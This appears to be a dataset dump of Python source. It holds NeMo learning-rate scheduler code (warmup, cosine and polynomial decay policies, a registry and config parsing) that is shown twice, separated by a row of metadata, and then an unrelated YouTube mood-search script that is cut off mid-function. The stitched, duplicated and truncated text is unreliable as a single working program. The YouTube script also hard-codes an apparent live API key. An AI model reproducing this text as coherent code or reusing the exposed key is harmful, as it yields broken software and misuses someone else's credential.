    def _get_lr(self, step):
        # The divisor grows with sqrt(step), normalised by the warmup length.
        scale = ((step + 1) / (self.warmup_steps + 1)) ** 0.5
        return [base_lr / scale for base_lr in self.base_lrs]
class PolynomialDecayAnnealing(WarmupPolicy):
    """Warmup followed by polynomial decay of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
        self.power = power
        self.cycle = cycle
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the post-warmup portion of training.
        decay_step = step - self.warmup_steps
        decay_span = self.max_steps - self.warmup_steps
        return [
            _poly_decay(
                base_lr,
                step=decay_step,
                decay_steps=decay_span,
                power=self.power,
                min_lr=self.min_lr,
                cycle=self.cycle,
            )
            for base_lr in self.base_lrs
        ]
class PolynomialHoldDecayAnnealing(WarmupHoldPolicy):
    """Warmup, hold, then polynomial decay of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
        self.power = power
        self.cycle = cycle
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the portion of training after the hold phase.
        decay_step = step - self.hold_steps
        decay_span = self.max_steps - max(self.warmup_steps, self.hold_steps)
        return [
            _poly_decay(
                base_lr,
                step=decay_step,
                decay_steps=decay_span,
                power=self.power,
                min_lr=self.min_lr,
                cycle=self.cycle,
            )
            for base_lr in self.base_lrs
        ]
def register_scheduler(name: str, scheduler: _LRScheduler, scheduler_params: SchedulerParams):
    """Add a scheduler class (and its parameter dataclass) to the registry.

    Custom schedulers registered here can later be resolved by name during
    instantiation via ``get_scheduler``.

    Args:
        name: Registry key under which the scheduler will be stored.
        scheduler: Scheduler class (inherits from _LRScheduler).
        scheduler_params: Dataclass describing the scheduler's parameters.

    Raises:
        ValueError: If ``name`` is already registered.
    """
    if name in AVAILABLE_SCHEDULERS:
        raise ValueError(f"Cannot override pre-existing schedulers. Conflicting scheduler name = {name}")

    AVAILABLE_SCHEDULERS[name] = scheduler

    params_key = "{}_params".format(scheduler.__name__)
    register_scheduler_params(name=params_key, scheduler_params=scheduler_params)
def get_scheduler(name: str, **kwargs: Optional[Dict[str, Any]]) -> _LRScheduler:
    """
    Convenience method to obtain an _LRScheduler class and partially instantiate it with optimizer kwargs.

    Args:
        name: Name of the scheduler in the registry.
        kwargs: Optional kwargs of the scheduler used during instantiation.

    Returns:
        a partially instantiated _LRScheduler
    """
    if name not in AVAILABLE_SCHEDULERS:
        # Bug fix: the message previously read "Cannot resolve scheduler<name>'."
        # (missing space and opening quote) and said "optimizers" for "schedulers".
        raise ValueError(
            f"Cannot resolve scheduler '{name}'. Available schedulers are : " f"{AVAILABLE_SCHEDULERS.keys()}"
        )

    scheduler_cls = AVAILABLE_SCHEDULERS[name]
    scheduler = partial(scheduler_cls, **kwargs)
    return scheduler
def prepare_lr_scheduler(
    optimizer: optim.Optimizer,
    scheduler_config: Union[Dict[str, Any], DictConfig],
    train_dataloader: Optional[dataloader.DataLoader] = None,
) -> Optional[Dict[str, Any]]:
    """
    Constructs an LR Scheduler (optionally) for a given optimizer, based on a config with the following schema

    optim:
        name: <name of optimizer>
        lr: <maximal learning rate>

        # <additional optimizer arguments>
        args:
            name: auto  # special keyword, resolves to correct optimizer config for given optimizer name
            # cls: nemo.core.config.optimizers.NovogradParams  # explicit instantiation by class path
            params:  # optional override parameters for the optimizer config
                betas: [0.8, 0.5]
                weight_decay: 0.001

        # scheduler setup
        sched:
            name: <name of scheduler>
            iters_per_batch: null # computed at runtime; mandatory to have
            max_steps: null # computed at runtime or explicitly set here; mandatory to have

            # pytorch lightning args <mandatory>
            monitor: val_loss
            reduce_on_plateau: false

            # <scheduler config override>
            args:
                name: auto  # special keyword, resolves to correct optimizer config for given optimizer name
                # cls: nemo.core.config.schedulers.CosineAnnealingParams  # explicit instantiation by class path
                params:  # optional override parameters for the optimizer config
                    warmup_steps: null
                    warmup_ratio: null
                    min_lr: 0.0
                    last_epoch: -1

    Args:
        optimizer: An instantiated Optimizer.
        scheduler_config: A dictionary / config dict which follows the above schema.
        train_dataloader: Optional requirement, must be passed if "iters_per_batch" is defined
            instead of "max_steps". Used to compute effective "max_steps".

    Returns:
        A dictionary containing the LR Scheduler implementation if the config was successfully parsed
        along with other parameters required by Pytorch Lightning, otherwise None.
    """
    # Build nested dictionary for convenience out of structured objects
    if isinstance(scheduler_config, DictConfig):
        scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)

    elif dataclasses.is_dataclass(scheduler_config):
        # Recursively transform data classes to basic dictionaries
        scheduler_config = OmegaConf.create(scheduler_config)
        scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)

    # Test to see if config follows above schema
    if scheduler_config is not None:
        if 'args' in scheduler_config:
            scheduler_args = scheduler_config.pop('args')
        else:
            scheduler_args = copy.deepcopy(scheduler_config)

            # Remove extra parameters from scheduler_args nest
            # Assume all other parameters are to be passed into scheduler constructor
            scheduler_args.pop('name', None)
            scheduler_args.pop('iters_per_batch', None)
            scheduler_args.pop('monitor', None)
            scheduler_args.pop('reduce_on_plateau', None)

    else:
        # Return gracefully in case `sched` was not supplied; inform user
        logging.info('Scheduler not initialized as no `sched` config supplied to setup_optimizer()')
        return None

    # Try instantiation of scheduler params from config class path
    try:
        scheduler_args_cfg = OmegaConf.create(scheduler_args)
        scheduler_conf = hydra.utils.instantiate(scheduler_args_cfg)
        scheduler_args = vars(scheduler_conf)

        # Get name of the scheduler
        scheduler_name = scheduler_conf.__class__.__name__

        if 'Params' in scheduler_name:
            scheduler_name = scheduler_name.replace('Params', '')

    except Exception:
        # Class path instantiation failed; try resolving "name" component

        # Get name of the scheduler
        if 'name' in scheduler_config:
            scheduler_name = scheduler_config['name']
        else:
            logging.warning(
                "Could not resolve classpath for Scheduler Config, and `name` "
                "was not provided either. \n"
                "Scheduler cannot be instantiated !"
            )
            return None

        # If class path was not provided, perhaps `name` is provided for resolution
        if 'name' in scheduler_args:
            # If `auto` is passed as name for resolution of optimizer name,
            # then lookup optimizer name and resolve its parameter config
            if scheduler_args['name'] == 'auto':
                scheduler_params_name = "{}Params".format(scheduler_name)
            else:
                scheduler_params_name = scheduler_args['name']

            # Get override arguments provided in the config yaml file / Dict Config
            scheduler_params_override = scheduler_args.get('params', {})

            # If params is itself a dict config object provided explicitly in Dict Config
            # Resolve to dictionary for convenience
            if isinstance(scheduler_params_override, DictConfig):
                scheduler_params_override = OmegaConf.to_container(scheduler_params_override, resolve=True)

            # Get and instantiate the Config dataclass for this scheduler
            scheduler_params_cls = get_scheduler_config(scheduler_params_name, **scheduler_params_override)
            scheduler_params = scheduler_params_cls()  # instantiate the parameters object
            scheduler_args = vars(scheduler_params)  # extract just the dictionary from the Config object

        else:
            # assume the input dictionary is schedular args (from dataclasses / omegaconf)
            pass

    # Extract value to monitor in losses, if provided.
    if 'monitor' in scheduler_config:
        monitor = scheduler_config.get('monitor')
    else:
        # Default to train loss
        monitor = 'loss'

    # Store exact max_steps if it is provided
    if 'max_steps' in scheduler_config and scheduler_config['max_steps'] is not None:
        max_steps = scheduler_config['max_steps']

    elif 'iters_per_batch' in scheduler_config:
        # Compute effective max_steps if iters_per_batch is provided
        if train_dataloader is None:
            logging.warning(
                'As `iters_per_batch` is provided/computed, it is required to pass the train dataloader in order\n'
                'to compute effective maximum number of steps.\n'
                'Scheduler will not be instantiated !'
            )
            return None

        # Raise exception if neither `max_steps` nor `iters_per_batch` is provided
        if scheduler_config.get('iters_per_batch', None) is None:
            # Bug fix: the warning used to read "is not not provided".
            logging.warning(
                "`iters_per_batch` cannot be None when `max_steps` is not provided.\n"
                "This can occur when `train dataloader` is not available to correctly "
                "prepare the scheduler.\n"
                "Scheduler will not be instantiated !"
            )
            return None

        # Get iters_per_batch
        iters_per_batch = scheduler_config.get('iters_per_batch')

        # Compute effective num max_steps
        num_samples = len(train_dataloader.dataset)
        batch_size = train_dataloader.batch_size
        max_steps = round(num_samples * iters_per_batch / float(batch_size))

    else:
        logging.warning(
            "Neither `max_steps` nor `iters_per_batch` were provided to `optim.sched`, "
            "cannot compute effective `max_steps` !\n"
            "Scheduler will not be instantiated !"
        )
        return None

    # Inject max_steps (effective or provided) into the scheduler config
    scheduler_args['max_steps'] = max_steps

    # Get the scheduler class from the config
    scheduler_cls = get_scheduler(scheduler_name, **scheduler_args)

    # Instantiate the LR schedule
    schedule = scheduler_cls(optimizer, **scheduler_args)

    logging.info(
        'Scheduler "%s" \nwill be used during training (effective maximum steps = %d) - \nParameters : \n(%s)',
        str(schedule),
        max_steps,
        OmegaConf.to_yaml(OmegaConf.create(scheduler_args)),
    )

    # Wrap the schedule in PTL arguments to perform stepwise computation
    # Rather than epoch level computation
    if isinstance(schedule, optim.lr_scheduler.ReduceLROnPlateau):
        reduce_lr_on_plateau = True
    else:
        reduce_lr_on_plateau = False

    schedule_dict = {
        'scheduler': schedule,
        'interval': 'step',
        'frequency': 1,
        'monitor': monitor,
        'reduce_on_plateau': reduce_lr_on_plateau,
    }
    return schedule_dict
# Registry mapping scheduler name -> scheduler class. Extended at runtime via
# register_scheduler(); mixes the NeMo warmup policies with native torch ones.
AVAILABLE_SCHEDULERS = {
    'WarmupPolicy': WarmupPolicy,
    'WarmupHoldPolicy': WarmupHoldPolicy,
    'SquareAnnealing': SquareAnnealing,
    'CosineAnnealing': CosineAnnealing,
    'WarmupAnnealing': WarmupAnnealing,
    'InverseSquareRootAnnealing': InverseSquareRootAnnealing,
    'SquareRootAnnealing': SquareRootAnnealing,
    'PolynomialDecayAnnealing': PolynomialDecayAnnealing,
    'PolynomialHoldDecayAnnealing': PolynomialHoldDecayAnnealing,
    'StepLR': pt_scheduler.StepLR,
    'ExponentialLR': pt_scheduler.ExponentialLR,
    'ReduceLROnPlateau': pt_scheduler.ReduceLROnPlateau,
    'CyclicLR': pt_scheduler.CyclicLR,
}
| 37.839655 | 119 | 0.659179 |
import copy
import dataclasses
import math
import warnings
from functools import partial
from typing import Any, Dict, Optional, Union
import hydra
import torch.optim as optim
import torch.optim.lr_scheduler as pt_scheduler
import torch.utils.data.dataloader as dataloader
from omegaconf import DictConfig, OmegaConf
from torch.optim.lr_scheduler import _LRScheduler
from nemo.core.config import SchedulerParams, get_scheduler_config, register_scheduler_params
from nemo.utils import logging
class WarmupPolicy(_LRScheduler):
    """Adds warmup kwargs and warmup logic to lr policy.

    All arguments should be passed as kwargs for clarity.

    Args:
        warmup_steps: Number of training steps in warmup stage
        warmup_ratio: Ratio of warmup steps to total steps
        max_steps: Total number of steps while training or ``None`` for
            infinite training
        min_lr: Floor for the learning rate once ``max_steps`` is exceeded
        last_epoch: Index of the last epoch (torch scheduler convention)
    """

    def __init__(self, optimizer, *, warmup_steps=None, warmup_ratio=None, max_steps=None, min_lr=0.0, last_epoch=-1):
        assert not (
            warmup_steps is not None and warmup_ratio is not None
        ), "Either use particular number of step or ratio"
        assert warmup_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"

        # Attributes must be assigned before the base __init__, which
        # immediately invokes step()/get_lr().
        self.max_steps = max_steps

        if warmup_steps is not None:
            self.warmup_steps = warmup_steps
        elif warmup_ratio is not None:
            self.warmup_steps = int(warmup_ratio * max_steps)
        else:
            self.warmup_steps = 0

        self.min_lr = min_lr
        super().__init__(optimizer, last_epoch)

    def get_lr(self):
        """Linear warmup, then the subclass decay policy, clamped to ``min_lr`` past ``max_steps``."""
        if not self._get_lr_called_within_step:
            warnings.warn(
                "To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
            )

        step = self.last_epoch

        if step <= self.warmup_steps:
            lr_val = (step + 1) / (self.warmup_steps + 1)
            return [initial_lr * lr_val for initial_lr in self.base_lrs]

        # Bug fix: guard against max_steps=None ("infinite training"), which
        # previously raised TypeError on `step > None`.
        if self.max_steps is not None and step > self.max_steps:
            return [self.min_lr for _ in self.base_lrs]

        return self._get_lr(step)

    def _get_lr(self, step):
        """Policy hook for subclasses; the base implementation keeps the LR constant."""
        return self.base_lrs
class WarmupHoldPolicy(WarmupPolicy):
    """Variant of WarmupPolicy which holds the peak learning rate for a number of steps after warmup.

    Args:
        warmup_steps: Number of training steps in warmup stage
        warmup_ratio: Ratio of warmup steps to total steps
        hold_steps: Number of training steps to hold the learning rate after warm up
        hold_ratio: Ratio of hold steps to total steps
        max_steps: Total number of steps while training or ``None`` for
            infinite training
    """

    def __init__(
        self,
        optimizer,
        *,
        warmup_steps=None,
        warmup_ratio=None,
        hold_steps=None,
        hold_ratio=None,
        max_steps=None,
        min_lr=0.0,
        last_epoch=-1,
    ):
        assert not (hold_steps is not None and hold_ratio is not None), "Either use particular number of step or ratio"
        assert hold_ratio is None or max_steps is not None, "If there is a ratio, there should be a total steps"

        self.min_lr = min_lr
        self._last_warmup_lr = 0.0  # NOTE(review): appears unused; kept for backward compatibility.

        # Warmup bookkeeping is computed here (and recomputed by the parent
        # __init__) because hold_steps depends on warmup_steps, and all
        # attributes must exist before the base scheduler's __init__ runs.
        self.max_steps = max_steps

        if warmup_steps is not None:
            self.warmup_steps = warmup_steps
        elif warmup_ratio is not None:
            self.warmup_steps = int(warmup_ratio * max_steps)
        else:
            self.warmup_steps = 0

        # hold_steps is stored as an absolute step index (warmup + hold).
        if hold_steps is not None:
            self.hold_steps = hold_steps + self.warmup_steps
        elif hold_ratio is not None:
            self.hold_steps = int(hold_ratio * max_steps) + self.warmup_steps
        else:
            self.hold_steps = 0

        super().__init__(
            optimizer,
            warmup_steps=warmup_steps,
            warmup_ratio=warmup_ratio,
            max_steps=max_steps,
            last_epoch=last_epoch,
            min_lr=min_lr,
        )

    def get_lr(self):
        """Warmup, then hold the base LR until ``hold_steps``, then the decay policy."""
        if not self._get_lr_called_within_step:
            warnings.warn(
                "To get the last learning rate computed by the scheduler, " "please use `get_last_lr()`.", UserWarning
            )

        step = self.last_epoch

        # Warmup phase
        if step <= self.warmup_steps:
            lr_val = (step + 1) / (self.warmup_steps + 1)
            return [initial_lr * lr_val for initial_lr in self.base_lrs]

        # Hold phase
        if (step >= self.warmup_steps) and (step < self.hold_steps):
            return self.base_lrs

        # Bug fix: max_steps may be None ("infinite training"); `step > None`
        # raises TypeError on Python 3.
        if self.max_steps is not None and step > self.max_steps:
            return [self.min_lr for _ in self.base_lrs]

        return self._get_lr(step)
def _squareroot_annealing(initial_lr, step, max_steps, min_lr):
    """Scale ``initial_lr`` by sqrt of the remaining-progress fraction; never below ``min_lr``."""
    mult = ((max_steps - step) / max_steps) ** 0.5
    out_lr = initial_lr * mult
    out_lr = max(out_lr, min_lr)
    return out_lr
def _square_annealing(initial_lr, step, max_steps, min_lr):
    """Scale ``initial_lr`` by the squared remaining-progress fraction; never below ``min_lr``."""
    mult = ((max_steps - step) / max_steps) ** 2
    out_lr = initial_lr * mult
    out_lr = max(out_lr, min_lr)
    return out_lr
def _cosine_annealing(initial_lr, step, max_steps, min_lr):
    """Cosine interpolation from ``initial_lr`` (step 0) down to ``min_lr`` (step ``max_steps``)."""
    mult = 0.5 * (1 + math.cos(math.pi * step / max_steps))
    out_lr = (initial_lr - min_lr) * mult + min_lr
    return out_lr
def _poly_decay(initial_lr, step, decay_steps, power, min_lr, cycle):
    """Polynomial decay from ``initial_lr`` to ``min_lr``.

    With ``cycle=True`` the decay horizon is stretched to the next multiple of
    ``decay_steps`` past the current step (a restarting schedule); otherwise
    ``step`` is clamped so the LR bottoms out at ``min_lr``.
    """
    if cycle:
        multiplier = 1.0 if step == 0 else math.ceil(step / decay_steps)
        decay_steps *= multiplier
    else:
        step = min(step, decay_steps)
    p = step / decay_steps
    lr = (initial_lr - min_lr) * math.pow(1.0 - p, power)
    lr += min_lr
    return lr
class SquareAnnealing(WarmupPolicy):
    """Warmup followed by quadratic annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=1e-5, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the post-warmup portion of training.
        new_lrs = [
            _square_annealing(
                initial_lr=initial_lr,
                step=step - self.warmup_steps,
                max_steps=self.max_steps - self.warmup_steps,
                min_lr=self.min_lr,
            )
            for initial_lr in self.base_lrs
        ]
        return new_lrs
class SquareRootAnnealing(WarmupPolicy):
    """Warmup followed by square-root annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # NOTE(review): unlike the other policies, the decay here runs over the
        # full step range (no warmup offset) — presumably intentional; verify.
        new_lrs = [
            _squareroot_annealing(initial_lr=initial_lr, step=step, max_steps=self.max_steps, min_lr=self.min_lr,)
            for initial_lr in self.base_lrs
        ]
        return new_lrs
class CosineAnnealing(WarmupPolicy):
    """Warmup followed by cosine annealing of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0, last_epoch=-1, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Every base LR must sit at or above the floor, otherwise the cosine
        # interpolation below is meaningless.
        for initial_lr in self.base_lrs:
            if initial_lr < self.min_lr:
                raise ValueError(
                    f"{self} received an initial learning rate that " f"was lower than the minimum learning rate."
                )
        new_lrs = [
            _cosine_annealing(
                initial_lr=initial_lr,
                step=step - self.warmup_steps,
                max_steps=self.max_steps - self.warmup_steps,
                min_lr=self.min_lr,
            )
            for initial_lr in self.base_lrs
        ]
        return new_lrs
class WarmupAnnealing(WarmupPolicy):
    """Warmup followed by linear annealing of the LR towards zero at ``max_steps``."""

    def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        progress = float(step / self.max_steps)
        warmup_ratio = float(self.warmup_steps / self.max_steps)
        # Linear ramp from 1 (end of warmup) down to 0 (at max_steps), clamped at 0.
        mult = max((progress - 1.0) / (warmup_ratio - 1.0), 0.0)
        out_lr = [initial_lr * mult for initial_lr in self.base_lrs]
        return out_lr
class InverseSquareRootAnnealing(WarmupPolicy):
    """Warmup followed by inverse-square-root decay of the LR."""

    def __init__(self, optimizer, *, max_steps, last_epoch=-1, min_lr=0.0, **kwargs):
        super().__init__(optimizer=optimizer, max_steps=max_steps, **kwargs, last_epoch=last_epoch, min_lr=min_lr)

    def _get_lr(self, step):
        # The divisor grows with sqrt(step), normalised by the warmup length.
        denom = ((step + 1) / (self.warmup_steps + 1)) ** 0.5
        out_lr = [initial_lr / denom for initial_lr in self.base_lrs]
        return out_lr
class PolynomialDecayAnnealing(WarmupPolicy):
    """Warmup followed by polynomial decay of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
        self.power = power
        self.cycle = cycle
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the post-warmup portion of training.
        new_lrs = [
            _poly_decay(
                initial_lr,
                step=step - self.warmup_steps,
                decay_steps=self.max_steps - self.warmup_steps,
                power=self.power,
                min_lr=self.min_lr,
                cycle=self.cycle,
            )
            for initial_lr in self.base_lrs
        ]
        return new_lrs
class PolynomialHoldDecayAnnealing(WarmupHoldPolicy):
    """Warmup, hold, then polynomial decay of the LR down to ``min_lr``."""

    def __init__(self, optimizer, *, max_steps, min_lr=0.0, power=1.0, cycle=False, last_epoch=-1, **kwargs):
        self.power = power
        self.cycle = cycle
        super().__init__(optimizer=optimizer, max_steps=max_steps, last_epoch=last_epoch, min_lr=min_lr, **kwargs)

    def _get_lr(self, step):
        # Decay is computed over the portion of training after the hold phase.
        new_lrs = [
            _poly_decay(
                initial_lr,
                step=step - self.hold_steps,
                decay_steps=self.max_steps - max(self.warmup_steps, self.hold_steps),
                power=self.power,
                min_lr=self.min_lr,
                cycle=self.cycle,
            )
            for initial_lr in self.base_lrs
        ]
        return new_lrs
def register_scheduler(name: str, scheduler: _LRScheduler, scheduler_params: SchedulerParams):
    """Add a scheduler class (and its parameter dataclass) to the registry.

    Raises:
        ValueError: If ``name`` is already registered.
    """
    if name in AVAILABLE_SCHEDULERS:
        raise ValueError(f"Cannot override pre-existing schedulers. Conflicting scheduler name = {name}")
    AVAILABLE_SCHEDULERS[name] = scheduler
    # The parameter dataclass is registered alongside under "<ClassName>_params".
    sched_name = "{}_params".format(scheduler.__name__)
    register_scheduler_params(name=sched_name, scheduler_params=scheduler_params)
def get_scheduler(name: str, **kwargs: Optional[Dict[str, Any]]) -> _LRScheduler:
    """Obtain an _LRScheduler class from the registry and partially instantiate it.

    Args:
        name: Name of the scheduler in the registry.
        kwargs: Optional kwargs of the scheduler used during instantiation.

    Returns:
        a partially instantiated _LRScheduler
    """
    if name not in AVAILABLE_SCHEDULERS:
        # Bug fix: the message previously read "Cannot resolve scheduler<name>'."
        # (missing space and opening quote) and said "optimizers" for "schedulers".
        raise ValueError(
            f"Cannot resolve scheduler '{name}'. Available schedulers are : " f"{AVAILABLE_SCHEDULERS.keys()}"
        )
    scheduler_cls = AVAILABLE_SCHEDULERS[name]
    scheduler = partial(scheduler_cls, **kwargs)
    return scheduler
def prepare_lr_scheduler(
    optimizer: optim.Optimizer,
    scheduler_config: Union[Dict[str, Any], DictConfig],
    train_dataloader: Optional[dataloader.DataLoader] = None,
) -> Optional[Dict[str, Any]]:
    """Optionally construct an LR scheduler for ``optimizer`` from a ``sched`` config.

    The config must supply the scheduler ``name`` (or a class path under
    ``args``) and either an explicit ``max_steps`` or ``iters_per_batch``
    (the latter requires ``train_dataloader`` so ``max_steps`` can be derived).

    Returns:
        A PyTorch-Lightning style dict with keys ``scheduler``, ``interval``,
        ``frequency``, ``monitor`` and ``reduce_on_plateau``, or ``None`` if
        the scheduler could not be instantiated from the config.
    """
    # Build nested dictionary for convenience out of structured objects
    if isinstance(scheduler_config, DictConfig):
        scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)

    elif dataclasses.is_dataclass(scheduler_config):
        # Recursively transform data classes to basic dictionaries
        scheduler_config = OmegaConf.create(scheduler_config)
        scheduler_config = OmegaConf.to_container(scheduler_config, resolve=True)

    # Test to see if config follows above schema
    if scheduler_config is not None:
        if 'args' in scheduler_config:
            scheduler_args = scheduler_config.pop('args')
        else:
            scheduler_args = copy.deepcopy(scheduler_config)

            # Remove extra parameters from scheduler_args nest
            # Assume all other parameters are to be passed into scheduler constructor
            scheduler_args.pop('name', None)
            scheduler_args.pop('iters_per_batch', None)
            scheduler_args.pop('monitor', None)
            scheduler_args.pop('reduce_on_plateau', None)

    else:
        # Return gracefully in case `sched` was not supplied; inform user
        logging.info('Scheduler not initialized as no `sched` config supplied to setup_optimizer()')
        return None

    # Try instantiation of scheduler params from config class path
    try:
        scheduler_args_cfg = OmegaConf.create(scheduler_args)
        scheduler_conf = hydra.utils.instantiate(scheduler_args_cfg)
        scheduler_args = vars(scheduler_conf)

        # Get name of the scheduler
        scheduler_name = scheduler_conf.__class__.__name__

        if 'Params' in scheduler_name:
            scheduler_name = scheduler_name.replace('Params', '')

    except Exception:
        # Class path instantiation failed; try resolving "name" component

        # Get name of the scheduler
        if 'name' in scheduler_config:
            scheduler_name = scheduler_config['name']
        else:
            logging.warning(
                "Could not resolve classpath for Scheduler Config, and `name` "
                "was not provided either. \n"
                "Scheduler cannot be instantiated !"
            )
            return None

        # If class path was not provided, perhaps `name` is provided for resolution
        if 'name' in scheduler_args:
            # If `auto` is passed as name for resolution of optimizer name,
            # then lookup optimizer name and resolve its parameter config
            if scheduler_args['name'] == 'auto':
                scheduler_params_name = "{}Params".format(scheduler_name)
            else:
                scheduler_params_name = scheduler_args['name']

            # Get override arguments provided in the config yaml file / Dict Config
            scheduler_params_override = scheduler_args.get('params', {})

            # If params is itself a dict config object provided explicitly in Dict Config
            # Resolve to dictionary for convenience
            if isinstance(scheduler_params_override, DictConfig):
                scheduler_params_override = OmegaConf.to_container(scheduler_params_override, resolve=True)

            # Get and instantiate the Config dataclass for this scheduler
            scheduler_params_cls = get_scheduler_config(scheduler_params_name, **scheduler_params_override)
            scheduler_params = scheduler_params_cls()  # instantiate the parameters object
            scheduler_args = vars(scheduler_params)  # extract just the dictionary from the Config object

        else:
            # assume the input dictionary is schedular args (from dataclasses / omegaconf)
            pass

    # Extract value to monitor in losses, if provided.
    if 'monitor' in scheduler_config:
        monitor = scheduler_config.get('monitor')
    else:
        # Default to train loss
        monitor = 'loss'

    # Store exact max_steps if it is provided
    if 'max_steps' in scheduler_config and scheduler_config['max_steps'] is not None:
        max_steps = scheduler_config['max_steps']

    elif 'iters_per_batch' in scheduler_config:
        # Compute effective max_steps if iters_per_batch is provided
        if train_dataloader is None:
            logging.warning(
                'As `iters_per_batch` is provided/computed, it is required to pass the train dataloader in order\n'
                'to compute effective maximum number of steps.\n'
                'Scheduler will not be instantiated !'
            )
            return None

        # Raise exception if neither `max_steps` nor `iters_per_batch` is provided
        if scheduler_config.get('iters_per_batch', None) is None:
            # Bug fix: the warning used to read "is not not provided".
            logging.warning(
                "`iters_per_batch` cannot be None when `max_steps` is not provided.\n"
                "This can occur when `train dataloader` is not available to correctly "
                "prepare the scheduler.\n"
                "Scheduler will not be instantiated !"
            )
            return None

        # Get iters_per_batch
        iters_per_batch = scheduler_config.get('iters_per_batch')

        # Compute effective num max_steps
        num_samples = len(train_dataloader.dataset)
        batch_size = train_dataloader.batch_size
        max_steps = round(num_samples * iters_per_batch / float(batch_size))

    else:
        logging.warning(
            "Neither `max_steps` nor `iters_per_batch` were provided to `optim.sched`, "
            "cannot compute effective `max_steps` !\n"
            "Scheduler will not be instantiated !"
        )
        return None

    # Inject max_steps (effective or provided) into the scheduler config
    scheduler_args['max_steps'] = max_steps

    # Get the scheduler class from the config
    scheduler_cls = get_scheduler(scheduler_name, **scheduler_args)

    # Instantiate the LR schedule
    schedule = scheduler_cls(optimizer, **scheduler_args)

    logging.info(
        'Scheduler "%s" \nwill be used during training (effective maximum steps = %d) - \nParameters : \n(%s)',
        str(schedule),
        max_steps,
        OmegaConf.to_yaml(OmegaConf.create(scheduler_args)),
    )

    # Wrap the schedule in PTL arguments to perform stepwise computation
    # Rather than epoch level computation
    if isinstance(schedule, optim.lr_scheduler.ReduceLROnPlateau):
        reduce_lr_on_plateau = True
    else:
        reduce_lr_on_plateau = False

    schedule_dict = {
        'scheduler': schedule,
        'interval': 'step',
        'frequency': 1,
        'monitor': monitor,
        'reduce_on_plateau': reduce_lr_on_plateau,
    }
    return schedule_dict
# Registry mapping scheduler name -> scheduler class. Extended at runtime via
# register_scheduler(); mixes the NeMo warmup policies with native torch ones.
AVAILABLE_SCHEDULERS = {
    'WarmupPolicy': WarmupPolicy,
    'WarmupHoldPolicy': WarmupHoldPolicy,
    'SquareAnnealing': SquareAnnealing,
    'CosineAnnealing': CosineAnnealing,
    'WarmupAnnealing': WarmupAnnealing,
    'InverseSquareRootAnnealing': InverseSquareRootAnnealing,
    'SquareRootAnnealing': SquareRootAnnealing,
    'PolynomialDecayAnnealing': PolynomialDecayAnnealing,
    'PolynomialHoldDecayAnnealing': PolynomialHoldDecayAnnealing,
    'StepLR': pt_scheduler.StepLR,
    'ExponentialLR': pt_scheduler.ExponentialLR,
    'ReduceLROnPlateau': pt_scheduler.ReduceLROnPlateau,
    'CyclicLR': pt_scheduler.CyclicLR,
}
| true | true |
f7236ac434b8832bd43e170de2b4dd505d787f85 | 2,154 | py | Python | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | moodevalyoutube.py | antverdovsky/Upside-Down | 9fd8bb4b1b74f855cb2e7523eecb8bdc58f3e614 | [
"MIT"
] | null | null | null | #!/usr/bin/python
"""
This code executes a search request for the specified search mood.
It takes in a Youtube API key provided by the developer
It randomizes the top results and returns a random URL based on what mood was
called
"""
import argparse
import logging
import json
import random
from pprint import pprint
#Importing all the required libraries
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
#Makes the youtube request annd parses it
# SECURITY(review): this API key is hard-coded and committed to source control.
# Move it to an environment variable / config file and revoke the exposed key.
DEVELOPER_KEY = 'AIzaSyCEGv-JQcjMIdpXYO9eIhAGWKLJn1XzXos'  # YouTube Data API key
YOUTUBE_API_SERVICE_NAME = 'youtube'  # API service name
YOUTUBE_API_VERSION = 'v3'  # API version
def mood_eval_youtube(keyword, limit):
    """Search YouTube for videos matching a mood keyword.

    Args:
        keyword (str): The mood / search term.
        limit (int): Maximum number of results to request.

    Returns:
        list: Watch-page URLs for the matching videos.
    """
    service = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
        developerKey = DEVELOPER_KEY)

    # Execute a search.list request for the query term.
    response = service.search().list(q=keyword, part='id,snippet',
        maxResults=limit).execute()

    # Keep only video hits; the API also returns channels and playlists.
    videos = []
    for item in response.get('items', []):
        item_id = item['id']
        if item_id['kind'] == 'youtube#video':
